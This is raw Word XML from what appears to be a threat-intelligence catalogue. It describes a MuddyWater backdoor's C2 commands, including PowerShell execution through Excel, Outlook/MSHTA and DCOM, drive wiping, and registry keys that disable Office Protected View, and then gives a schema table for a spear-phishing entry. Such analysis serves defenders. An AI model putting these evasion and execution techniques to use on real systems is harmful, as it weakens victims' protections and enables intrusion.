        <w:t>Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798711E" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If command starts with “excel”, then it leverages </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DDEInitiate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Method of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Excel.Appilcation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065741DD" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the command starts with “outlook”, then it leverages </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Outlook.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and MSHTA to execute the code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFF9C9" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>If the command starts with “risk”, then execution is performed through DCOM object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A380787" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
        <w:t>File upload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32859EC2" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
        <w:t>Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2854B7" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableAttachmentsInPV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6546BAF5" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableInternetFilesInPV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="657F37F9" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DisableUnsafeLocationsInPV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EFA0300" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
        <w:t>Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A09AE6" w14:textId="77777777" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
        <w:t>Ability to sleep for a given number of seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F7F95D" w14:textId="1326D158" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="008F0B7F">
      <w:r>
        <w:t>C2 Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C134E7" w14:textId="39AFDA9B" w:rsidR="008F0B7F" w:rsidRPr="00527511" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00527511">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidR="00527511" w:rsidRPr="00527511">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00527511" w:rsidRPr="00527511">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Desc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="089CD18C" w14:textId="5E8DDC30" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Reboot - Reboot the system using shutdown command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD6204B" w14:textId="03451627" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Shutdown - Shut down the system using shutdown command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EB5BD3" w14:textId="0C6F7B30" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Clean - Wipe the Drives, C:\, D:\, E:\, F:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51BFDB" w14:textId="4075A4AB" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot - Take a screenshot of the System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CADCE7" w14:textId="2BD58994" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Upload - Encrypt and upload the information from the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F8B4F" w14:textId="6806026B" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Excel  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Leverage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Excel.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> COM object for code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A665E9F" w14:textId="59A5FF36" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outlook - Leverage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Outlook.Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> COM object for code execution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B356B" w14:textId="584B3E68" w:rsidR="008F0B7F" w:rsidRDefault="008F0B7F" w:rsidP="00527511">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Risk - Leverage DCOM object for code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA25E7B" w14:textId="53DDB733" w:rsidR="00A60655" w:rsidRDefault="00A60655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C43A9" w14:textId="4BF61C24" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00345E09">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc153480892"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6ABC">
        <w:t>Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="702C90AB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00345E09">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345E09" w:rsidRPr="002D1D50" w14:paraId="2FAEEECF" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78B6EDFF" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD555D6" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="002D1D50" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F4AB282" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="5B1BD381" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650C3CE9" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21899BF3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>MuddyWater</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="373082EF" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="2779BBFD" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558DDD0B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="007328DE" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E65DF64" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="007328DE" w:rsidRDefault="00345E09" w:rsidP="00432976">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6537C47C" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="0D8573A4" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042DA4D1" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66189979" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="007328DE" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Iran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C4B5F6" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="62757388" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B202D0" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F22D427" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Turkey, Pakistan, Tajikistan [2] Middle East [1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2631E045" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="7A532B74" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDE18A6" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="396475E4" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] Government, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0B80A5" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00387DCC" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="13339984" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B70876" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCC7280" w14:textId="19E5A247" w:rsidR="00345E09" w:rsidRDefault="00936DD6" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00936DD6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61519E52" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="2399CC5E" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D951BBE" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C562A1B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="309A1EBB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="027B77D2" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E420338" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="258269B7" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="171E5A50" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="7E3EF1A1" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60C4B55F" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756ED699" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="382BAAA9" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873778" w:rsidRPr="00B857D7" w14:paraId="5A1E8245" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC89E54" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E6EEBA2" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60528E00" w14:textId="77777777" w:rsidR="00873778" w:rsidRDefault="00873778" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="2FD6AC88" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B07513" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D88462C" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
